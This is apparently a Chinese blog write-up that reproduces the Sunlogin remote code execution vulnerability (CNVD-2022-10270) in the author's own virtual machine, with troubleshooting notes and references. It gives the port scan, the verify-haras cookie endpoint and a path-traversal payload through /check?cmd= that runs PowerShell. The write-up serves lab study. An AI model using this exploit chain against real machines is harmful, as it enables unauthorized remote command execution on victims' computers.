环境配置
链接:https://pan.baidu.com/s/1MVCW_Ggk-hAd05_y7ODwEw
提取码:wxu9
个人版
操作步骤
遇到的问题
nmap扫一扫(安装完后最好重启一下,不然明明扫到端口开启访问也是失败)
nmap -p 40000-65535 ip
反正是虚拟机自己测试,也可以拿这个看,在本地地址和外部均为0.0.0.0处
netstat -ano
cmd使用curl或者浏览器访问都可以
出现这些信息就算是有漏洞了
curl ip:端口
然后拿Cookie信息
/cgi-bin/rpc?action=verify-haras
最后就是payload直接执行命令
/check?cmd=ping../../../../../../../../../Windows/System32/WindowsPowerShell/v1.0/powershell.exe+%20ipconfig
看他们“/”和空格都用url编码,我也替换试试,但很还是失败了
也有可能是我哪里打错了,所以我整了个工具来试试
命令执行成功,给我回显个认证失败
我检查了我下载的向日葵,这是在互联网找的,在他们这边下载的软件都无法检测到新版本,可能是这个原因
问题解决
换个没有被搞过的向日葵官方安装包
再跑一遍
VM虚拟机挂起再启动ip会换
提交
成功
简约版
简约版我找不到正常的安装包,没办法进行
参考链接:
https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
复现CVE-2022-10270(向日葵远程代码执行漏洞)_南巷油条的博客-CSDN博客
远程控制漏洞CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现与解决_告诉桃花不用开了的博客-CSDN博客
文章评论